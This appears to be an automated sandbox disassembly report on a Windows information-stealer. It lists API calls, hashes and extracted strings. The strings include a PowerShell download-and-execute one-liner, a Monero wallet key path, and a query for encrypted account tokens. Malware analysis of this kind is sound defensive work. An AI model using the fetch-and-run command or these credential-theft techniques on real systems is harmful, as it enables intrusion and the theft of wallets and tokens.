                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB$@
                                  • API String ID: 2774356765-3474575989
                                  APIs
                                    • Part of subcall function 00E5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E5A7E6
                                    • Part of subcall function 00E447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E44839
                                    • Part of subcall function 00E447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E44849
                                  • InternetOpenA.WININET(00E60DF7,00000001,00000000,00000000,00000000), ref: 00E4610F
                                  • StrCmpCA.SHLWAPI(?,01CBF318), ref: 00E46147
                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00E4618F
                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00E461B3
                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 00E461DC
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00E4620A
                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00E46249
                                  • InternetCloseHandle.WININET(?), ref: 00E46253
                                  • InternetCloseHandle.WININET(00000000), ref: 00E46260
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Similarity
                                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2507841554-0
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
                                    • Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                    • Part of subcall function 00E5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E5A7E6
                                  • lstrlen.KERNEL32(00000000), ref: 00E4BC9F
                                    • Part of subcall function 00E58E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E58E52
                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 00E4BCCD
                                  • lstrlen.KERNEL32(00000000), ref: 00E4BDA5
                                  • lstrlen.KERNEL32(00000000), ref: 00E4BDB9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                  • API String ID: 3073930149-1079375795
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Similarity
                                  • API ID: ExitProcess$DefaultLangUser
                                  • String ID: *
                                  • API String ID: 1494266314-163128923
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00E44FCA
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E44FD1
                                  • InternetOpenA.WININET(00E60DDF,00000000,00000000,00000000,00000000), ref: 00E44FEA
                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00E45011
                                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00E45041
                                  • InternetCloseHandle.WININET(?), ref: 00E450B9
                                  • InternetCloseHandle.WININET(?), ref: 00E450C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                  • String ID:
                                  • API String ID: 3066467675-0
                                  APIs
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00E58426
                                  • wsprintfA.USER32 ref: 00E58459
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00E5847B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E5848C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E58499
                                    • Part of subcall function 00E5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E5A7E6
                                  • RegQueryValueExA.ADVAPI32(00000000,01CBEAF8,00000000,000F003F,?,00000400), ref: 00E584EC
                                  • lstrlen.KERNEL32(?), ref: 00E58501
                                  • RegQueryValueExA.ADVAPI32(00000000,01CBEA98,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00E60B34), ref: 00E58599
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E58608
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E5861A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Similarity
                                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 3896182533-4073750446
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E576A4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E576AB
                                  • RegOpenKeyExA.ADVAPI32(80000002,01CAC720,00000000,00020119,00000000), ref: 00E576DD
                                  • RegQueryValueExA.ADVAPI32(00000000,01CBEB70,00000000,00000000,?,000000FF), ref: 00E576FE
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E57708
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E57734
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E5773B
                                  • RegOpenKeyExA.ADVAPI32(80000002,01CAC720,00000000,00020119,00E576B9), ref: 00E5775B
                                  • RegQueryValueExA.ADVAPI32(00E576B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00E5777A
                                  • RegCloseKey.ADVAPI32(00E576B9), ref: 00E57784
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3225020163-1022791448
                                  APIs
                                  • CreateFileA.KERNEL32(:,80000000,00000003,00000000,00000003,00000080,00000000,?,00E53AEE,?), ref: 00E592FC
                                  • GetFileSizeEx.KERNEL32(000000FF,:), ref: 00E59319
                                  • CloseHandle.KERNEL32(000000FF), ref: 00E59327
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Similarity
                                  • API ID: File$CloseCreateHandleSize
                                  • String ID: :$:
                                  • API String ID: 1378416451-4250114551
                                  • Opcode ID: d9270341abb9bb6e39df6493bf633a91363255049927f80938574662466351df
                                  • Instruction ID: 081e32b486bea305d95b4a3fd07d054160fa4ed5ee90774e4fe4af3292c57a72
                                  • Opcode Fuzzy Hash: d9270341abb9bb6e39df6493bf633a91363255049927f80938574662466351df
                                  • Instruction Fuzzy Hash: EDF08C34F04208FBDB20DBB0DC08B9E77B9EB48711F108654BA92A72C4D67596009B40
                                  APIs
                                  • memset.MSVCRT ref: 00E540D5
                                  • RegOpenKeyExA.ADVAPI32(80000001,01CBDFB8,00000000,00020119,?), ref: 00E540F4
                                  • RegQueryValueExA.ADVAPI32(?,01CBEC18,00000000,00000000,00000000,000000FF), ref: 00E54118
                                  • RegCloseKey.ADVAPI32(?), ref: 00E54122
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E54147
                                  • lstrcat.KERNEL32(?,01CBEC30), ref: 00E5415B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValuememset
                                  • String ID:
                                  • API String ID: 2623679115-0
                                  • Opcode ID: 18f2d5f69eb70d948be32dc375939af3836cdcb5ce0eee7804b87aa2f28d53fa
                                  • Instruction ID: e767e1c7c299d8cdeffa21b432ffc9ea5407df539c33d9632cc529c5fbab5354
                                  • Opcode Fuzzy Hash: 18f2d5f69eb70d948be32dc375939af3836cdcb5ce0eee7804b87aa2f28d53fa
                                  • Instruction Fuzzy Hash: 70418AB6D10108ABDF24EBA0EC46FEE737DA788300F004959B65567185EE795B8C8BA1
                                  APIs
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E499EC
                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E49A11
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00E49A31
                                  • ReadFile.KERNEL32(000000FF,?,00000000,00E4148F,00000000), ref: 00E49A5A
                                  • LocalFree.KERNEL32(00E4148F), ref: 00E49A90
                                  • CloseHandle.KERNEL32(000000FF), ref: 00E49A9A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: 787fa877a27f9a1e13948dbedb1823ba3d72063c33a1ba4b2b9f1571c3ea087c
                                  • Instruction ID: 587a0c017a3519efd531effdf54ea97380ae757d1004dc626c39a9a942b10512
                                  • Opcode Fuzzy Hash: 787fa877a27f9a1e13948dbedb1823ba3d72063c33a1ba4b2b9f1571c3ea087c
                                  • Instruction Fuzzy Hash: E6313AB4A00209EFDB24CF94D885BAE77F5FF48304F108158E902B7284D779AA41DFA0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: String___crt$Typememset
                                  • String ID:
                                  • API String ID: 3530896902-3916222277
                                  • Opcode ID: 39c0f6df5db16d2686aaaa9bedc2868954f11611711603ed61c94eec0a9e35ed
                                  • Instruction ID: 1777d943a968b920fc8cd1855116d817567842f6d6d275fe84520deacbfabeac
                                  • Opcode Fuzzy Hash: 39c0f6df5db16d2686aaaa9bedc2868954f11611711603ed61c94eec0a9e35ed
                                  • Instruction Fuzzy Hash: D641E77110079C5EDB258B248C94FFB7BF89B45709F2458A8ED8AA6182D2719A49CF60
                                  APIs
                                  • lstrcat.KERNEL32(?,01CBED50), ref: 00E547DB
                                    • Part of subcall function 00E58DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E58E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E54801
                                  • lstrcat.KERNEL32(?,?), ref: 00E54820
                                  • lstrcat.KERNEL32(?,?), ref: 00E54834
                                  • lstrcat.KERNEL32(?,01CABF58), ref: 00E54847
                                  • lstrcat.KERNEL32(?,?), ref: 00E5485B
                                  • lstrcat.KERNEL32(?,01CBE118), ref: 00E5486F
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E58D90: GetFileAttributesA.KERNEL32(00000000,?,00E41B54,?,?,00E6564C,?,?,00E60E1F), ref: 00E58D9F
                                    • Part of subcall function 00E54570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00E54580
                                    • Part of subcall function 00E54570: RtlAllocateHeap.NTDLL(00000000), ref: 00E54587
                                    • Part of subcall function 00E54570: wsprintfA.USER32 ref: 00E545A6
                                    • Part of subcall function 00E54570: FindFirstFileA.KERNEL32(?,?), ref: 00E545BD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                  • String ID:
                                  • API String ID: 2540262943-0
                                  • Opcode ID: 052484104d5db2e42d6b8e1de42925ba7ac4f4ca7e824006054723c92019cfd5
                                  • Instruction ID: 2393eef2299cc966180b6a6a4f3e60abe90786dd1206e291d5fcb3544937ab36
                                  • Opcode Fuzzy Hash: 052484104d5db2e42d6b8e1de42925ba7ac4f4ca7e824006054723c92019cfd5
                                  • Instruction Fuzzy Hash: 463176B290021897CB24F770DC85EED73BCAB48701F405999B79976085EE78978DCB91
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
                                    • Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00E52D85
                                  Strings
                                  • <, xrefs: 00E52D39
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00E52D04
                                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00E52CC4
                                  • ')", xrefs: 00E52CB3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 3031569214-898575020
                                  • Opcode ID: 13fc75129d150d3ec5067297434e18250ebf3209bb07c151037c21f0bd20a6f0
                                  • Instruction ID: 5e12ac3359714836fa97eec89972114cd1b39513c485ce6d8f1a4b073874fb89
                                  • Opcode Fuzzy Hash: 13fc75129d150d3ec5067297434e18250ebf3209bb07c151037c21f0bd20a6f0
                                  • Instruction Fuzzy Hash: 2C410071C102189ADB18FFA0D896BDDB7B4BF10301F445629E906B7192EF742A4ECF91
                                  APIs
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00E49F41
                                    • Part of subcall function 00E5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E5A7E6
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$AllocLocal
                                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                  • API String ID: 4171519190-1096346117
                                  • Opcode ID: e5cbfdc7dab364f52eecd0c3d6a1191943a3eb6893f8b3352ebb84741b32df75
                                  • Instruction ID: 2e854db539e3fdc1447c66c0919e20e39cc8f21c61e5ddfdd803a0048ef8069a
                                  • Opcode Fuzzy Hash: e5cbfdc7dab364f52eecd0c3d6a1191943a3eb6893f8b3352ebb84741b32df75
                                  • Instruction Fuzzy Hash: D2616131A50208DBDB24EFA4DC96FEE77B5AF44340F049528F90A7F181EB746A09CB52
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                  • memset.MSVCRT ref: 00E5716A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpymemset
                                  • String ID: s$s$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                  • API String ID: 4047604823-3520659465
                                  • Opcode ID: 5773684b0e1a2eb633d165ce2992dc68ff5fd79bc4a6938f36717fe22b9e71e5
                                  • Instruction ID: c6d094fff9e2c5e1a15e8d993749b2405ea48627d292a9329329e96c7115b0aa
                                  • Opcode Fuzzy Hash: 5773684b0e1a2eb633d165ce2992dc68ff5fd79bc4a6938f36717fe22b9e71e5
                                  • Instruction Fuzzy Hash: 6251A4B0C042189FDB14EB90ED85BEEB3B4AF44305F5469A8E94577181EB746E8CCF54
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 00E5696C
                                  • sscanf.NTDLL ref: 00E56999
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00E569B2
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00E569C0
                                  • ExitProcess.KERNEL32 ref: 00E569DA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$System$File$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 2533653975-0
                                  • Opcode ID: 8582761e0937aae7fda50daff75457ef48b22ba0b1c4ead2d7ee6cb88bbfced9
                                  • Instruction ID: 73bbd19f5083e7b2b16558c770bc7554539cce08aed65ce2a4e000ef3044188f
                                  • Opcode Fuzzy Hash: 8582761e0937aae7fda50daff75457ef48b22ba0b1c4ead2d7ee6cb88bbfced9
                                  • Instruction Fuzzy Hash: 2321EA75D14208EBCF08EFE4D945AEEB7B5BF48301F04852AE446B3244EB355609CB65
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E57E37
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E57E3E
                                  • RegOpenKeyExA.ADVAPI32(80000002,01CAC9C0,00000000,00020119,?), ref: 00E57E5E
                                  • RegQueryValueExA.ADVAPI32(?,01CBE038,00000000,00000000,000000FF,000000FF), ref: 00E57E7F
                                  • RegCloseKey.ADVAPI32(?), ref: 00E57E92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: bfaf0fceeb610086905acd2185fa5cf4aae8aaf000c9c76d065a6e175a3d4694
                                  • Instruction ID: 41a1a7dfbf2be15bfd839ff604516e779f086f304d08aaad064605521d19485f
                                  • Opcode Fuzzy Hash: bfaf0fceeb610086905acd2185fa5cf4aae8aaf000c9c76d065a6e175a3d4694
                                  • Instruction Fuzzy Hash: 931191B1A48305EBD710CF94EC4AFBFBBB8FB44711F10451AFA85A7684DB7958048BA0
                                  APIs
                                  • StrStrA.SHLWAPI(01CBE9C0,?,?,?,00E5140C,?,01CBE9C0,00000000), ref: 00E5926C
                                  • lstrcpyn.KERNEL32(0108AB88,01CBE9C0,01CBE9C0,?,00E5140C,?,01CBE9C0), ref: 00E59290
                                  • lstrlen.KERNEL32(?,?,00E5140C,?,01CBE9C0), ref: 00E592A7
                                  • wsprintfA.USER32 ref: 00E592C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpynlstrlenwsprintf
                                  • String ID: %s%s
                                  • API String ID: 1206339513-3252725368
                                  • Opcode ID: afb2d5653d859957336ec504cc335e2ec66dfc0422276012353bce08511d2fa1
                                  • Instruction ID: 3d9a5601ff394e27cb474bc58962898c7b36ecda4ead0c157d941a7dcca12e7d
                                  • Opcode Fuzzy Hash: afb2d5653d859957336ec504cc335e2ec66dfc0422276012353bce08511d2fa1
                                  • Instruction Fuzzy Hash: 86015E75604208FFCB04DFECD984EAE3BB9FB48394F108549F9899B605C639EA40DB90
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E412B4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E412BB
                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00E412D7
                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00E412F5
                                  • RegCloseKey.ADVAPI32(?), ref: 00E412FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: d67ec1ff8067b30939fe146f49f2f7f707ee3d42b494526b188e5ede2501f883
                                  • Instruction ID: 4431d4f6c9a8bd58587c8c7f514e0e311e0b62bfb1dec0fd1cb4f908102327ed
                                  • Opcode Fuzzy Hash: d67ec1ff8067b30939fe146f49f2f7f707ee3d42b494526b188e5ede2501f883
                                  • Instruction Fuzzy Hash: 050112B5A44208FBDB10DFD0DC49FAEB7B8EB48701F008155FA4597284D6759A019B60
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00E56663
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00E56726
                                  • ExitProcess.KERNEL32 ref: 00E56755
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                  • String ID: <
                                  • API String ID: 1148417306-4251816714
                                  • Opcode ID: a8d41d2cd9e8edaa118a6b7222fe5ab97be52b4b15adfce404c0fca31395892d
                                  • Instruction ID: 8d272f8c67e5789e26acbed0d7899c3ffd9eeb301e63cc5e945c40dfef9571fd
                                  • Opcode Fuzzy Hash: a8d41d2cd9e8edaa118a6b7222fe5ab97be52b4b15adfce404c0fca31395892d
                                  • Instruction Fuzzy Hash: A9316BB1901218AADB14EB90DC86BDEB7B8AF48300F405599F60A77181DF786B48CF69
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00E60E28,00000000,?), ref: 00E5882F
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E58836
                                  • wsprintfA.USER32 ref: 00E58850
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 1695172769-2206825331
                                  • Opcode ID: b66c43d5e6078ffb0dfd80f608643e3c50a214dae30c4efa01cb87516fc93cd3
                                  • Instruction ID: bbab36b1747f5452ce0f92dec43650116476a9bc6f0c8d75ce310777e6108420
                                  • Opcode Fuzzy Hash: b66c43d5e6078ffb0dfd80f608643e3c50a214dae30c4efa01cb87516fc93cd3
                                  • Instruction Fuzzy Hash: 7C215EB1A44204EFDB14DFD4DD45FAEBBB8FB48711F10451AFA45B7684C77A99008BA0
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00E5951E,00000000), ref: 00E58D5B
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E58D62
                                  • wsprintfW.USER32 ref: 00E58D78
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesswsprintf
                                  • String ID: %hs
                                  • API String ID: 769748085-2783943728
                                  • Opcode ID: 939f9fb30a0431674d42ba01c3b0ce90e165ad951cf457275001f9e2ad99df1a
                                  • Instruction ID: 8bf5cb868578de4fefb89810d25cdd8aae5241c3e8d43dbf4d6b8b1ffe596591
                                  • Opcode Fuzzy Hash: 939f9fb30a0431674d42ba01c3b0ce90e165ad951cf457275001f9e2ad99df1a
                                  • Instruction Fuzzy Hash: 56E08CB0B54208FBC720DB94EC0AE6D77B8EB04702F000095FE8A97680DA769E009BA1
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
